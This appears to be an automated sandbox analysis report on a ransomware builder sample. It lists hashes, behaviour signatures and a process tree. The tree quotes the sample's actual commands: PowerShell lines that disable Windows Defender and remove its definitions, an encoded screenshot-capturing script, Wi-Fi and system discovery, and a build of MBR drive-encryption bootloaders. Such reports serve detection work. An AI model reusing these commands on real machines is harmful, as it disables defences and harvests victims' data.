Analysis
-
max time kernel
251s -
max time network
204s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
13-11-2024 10:30
Errors
General
-
Target
Slam Ransomware Builder.exe
-
Size
45.2MB
-
MD5
47e59722cd9850f1b880e8b609451794
-
SHA1
0e0447dbbcf333c692a09af6f7e46c0c80767395
-
SHA256
feac51e6fa0f258fe8865c1f55f893bcfe7527c8e013fe36034abf7e2bc86d72
-
SHA512
342f92cde3dd438299a142f4efe2e4c576761a968064c6caf48b5fa0550d59b4d37a7e00dae15f70dffe6d50b3753505e9351dcb52f1c82b601437e18d0d1f95
-
SSDEEP
786432:cP8GvbAwd62IMqswd/VWZv7Ed9eVuVIufGoFGH3b98bUhwKkeA:cLpIppav7EdEIVIVoQH3ZOUhwKU
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 45 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
-
UPX packed file 58 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 64 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 35 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies data under HKEY_USERS 7 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Slam Ransomware Builder.exe"C:\Users\Admin\AppData\Local\Temp\Slam Ransomware Builder.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\slam_mbr_builder\ndp472-devpack-enu.exe"C:\slam_mbr_builder\ndp472-devpack-enu.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\Temp\{0CE05A98-6DC1-419E-AC48-E53AEA824BC4}\.cr\ndp472-devpack-enu.exe"C:\Windows\Temp\{0CE05A98-6DC1-419E-AC48-E53AEA824BC4}\.cr\ndp472-devpack-enu.exe" -burn.clean.room="C:\slam_mbr_builder\ndp472-devpack-enu.exe" -burn.filehandle.attached=700 -burn.filehandle.self=5524⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
-
C:\Windows\Temp\{6F4D2E13-845F-46B5-9B01-96D1E095E2AC}\.be\NDP472-DevPack-ENU.exe"C:\Windows\Temp\{6F4D2E13-845F-46B5-9B01-96D1E095E2AC}\.be\NDP472-DevPack-ENU.exe" -q -burn.elevated BurnPipe.{420E47AF-7DB2-4BF1-9344-635E4D638E2F} {A0DEEFEF-69D7-4134-94B6-B825AC531F8B} 24445⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start C:\slam_mbr_builder\start.exe & exit3⤵
- System Location Discovery: System Language Discovery
-
C:\slam_mbr_builder\start.exeC:\slam_mbr_builder\start.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BD7F.tmp\start.bat" C:\slam_mbr_builder\start.exe"5⤵
- System Location Discovery: System Language Discovery
-
C:\slam_mbr_builder\smbrb.exesmbrb6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd BOOTLOADER & del BIN\*.bin & TOOLS\NASM\nasm.exe -fbin -o BIN\encryptLoader.bin SOURCE\encryptLoader.asm & BIN\bin2hex --i BIN\encryptLoader.bin --o BIN\encryptLoaderhex.bin & TOOLS\NASM\nasm.exe -fbin -o BIN\driveEncryption.bin SOURCE\driveEncryption.asm & BIN\bin2hex --i BIN\driveEncryption.bin --o BIN\driveEncryptionhex.bin & TOOLS\NASM\nasm.exe -fbin -o BIN\bannerLoader.bin SOURCE\bannerLoader.asm & BIN\bin2hex --i BIN\bannerLoader.bin --o BIN\bannerLoaderhex.bin & TOOLS\NASM\nasm.exe -fbin -o BIN\bannerKernel.bin SOURCE\bannerKernel.asm & BIN\bin2hex --i BIN\bannerKernel.bin --o BIN\bannerKernelhex.bin & TOOLS\DD\dd.exe if=/dev/zero of=TEST_DISK\disk.img bs=1024 count=1440 & TOOLS\DD\dd.exe if=BIN\encryptLoader.bin of=TEST_DISK\disk.img & TOOLS\DD\dd.exe if=BIN\driveEncryption.bin of=TEST_DISK\disk.img bs=512 seek=3 & TOOLS\DD\dd.exe if=BIN\bannerLoader.bin of=TEST_DISK\disk.img bs=512 seek=5 & TOOLS\DD\dd.exe if=BIN\bannerKernel.bin of=TEST_DISK\disk.img bs=512 seek=1 & exit7⤵
- System Location Discovery: System Language Discovery
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\NASM\nasm.exeTOOLS\NASM\nasm.exe -fbin -o BIN\encryptLoader.bin SOURCE\encryptLoader.asm8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\BIN\bin2hex.exeBIN\bin2hex --i BIN\encryptLoader.bin --o BIN\encryptLoaderhex.bin8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\NASM\nasm.exeTOOLS\NASM\nasm.exe -fbin -o BIN\driveEncryption.bin SOURCE\driveEncryption.asm8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\BIN\bin2hex.exeBIN\bin2hex --i BIN\driveEncryption.bin --o BIN\driveEncryptionhex.bin8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\NASM\nasm.exeTOOLS\NASM\nasm.exe -fbin -o BIN\bannerLoader.bin SOURCE\bannerLoader.asm8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\BIN\bin2hex.exeBIN\bin2hex --i BIN\bannerLoader.bin --o BIN\bannerLoaderhex.bin8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\NASM\nasm.exeTOOLS\NASM\nasm.exe -fbin -o BIN\bannerKernel.bin SOURCE\bannerKernel.asm8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\BIN\bin2hex.exeBIN\bin2hex --i BIN\bannerKernel.bin --o BIN\bannerKernelhex.bin8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\DD\dd.exeTOOLS\DD\dd.exe if=/dev/zero of=TEST_DISK\disk.img bs=1024 count=14408⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\DD\dd.exeTOOLS\DD\dd.exe if=BIN\encryptLoader.bin of=TEST_DISK\disk.img8⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\DD\dd.exeTOOLS\DD\dd.exe if=BIN\driveEncryption.bin of=TEST_DISK\disk.img bs=512 seek=38⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\DD\dd.exeTOOLS\DD\dd.exe if=BIN\bannerLoader.bin of=TEST_DISK\disk.img bs=512 seek=58⤵
- Executes dropped EXE
-
-
C:\slam_mbr_builder\BOOTLOADER\TOOLS\DD\dd.exeTOOLS\DD\dd.exe if=BIN\bannerKernel.bin of=TEST_DISK\disk.img bs=512 seek=18⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c MSBuild MbrOverwriter\mbrcs.sln & pause7⤵
- System Location Discovery: System Language Discovery
-
C:\slam_mbr_builder\MSBuild.exeMSBuild MbrOverwriter\mbrcs.sln8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\slam_mbr_builder\Roslyn\VBCSCompiler.exe"C:\slam_mbr_builder\Roslyn\VBCSCompiler.exe" "-pipename:nVPhx1j0lFfdXs1tAOBeL3YcrBffq697F3mTz2k6ECM"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\explorer.exe"C:\Users\Admin\AppData\Local\Temp\explorer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\explorer.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jif5lhrw\jif5lhrw.cmdline"6⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0E1.tmp" "c:\Users\Admin\AppData\Local\Temp\jif5lhrw\CSC5E6A205F9A2A4FFA988A95475C82F75.TMP"7⤵
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
